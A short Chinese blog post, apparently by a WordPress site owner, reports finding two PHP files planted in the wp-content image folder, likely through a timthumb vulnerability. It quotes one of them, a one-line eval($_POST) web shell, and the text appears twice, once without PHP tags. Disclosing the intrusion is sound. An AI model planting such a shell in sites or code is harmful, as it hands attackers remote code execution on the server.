今天整理博客的图片资源,发现之前的Wordpress被人hacked。wp-content/ 图片文件夹下有两个php文件,应该是之前通过timthumb脚本漏洞注入的,一直没有发现。
1jh.php
1 | eval($_POST[1]); |
Pacifism.php
1 |
|
今天整理博客的图片资源,发现之前的Wordpress被人hacked。wp-content/ 图片文件夹下有两个php文件,应该是之前通过timthumb脚本漏洞注入的,一直没有发现。
1jh.php
1 | <?php eval($_POST[1]);?> |
Pacifism.php
1 | <?php |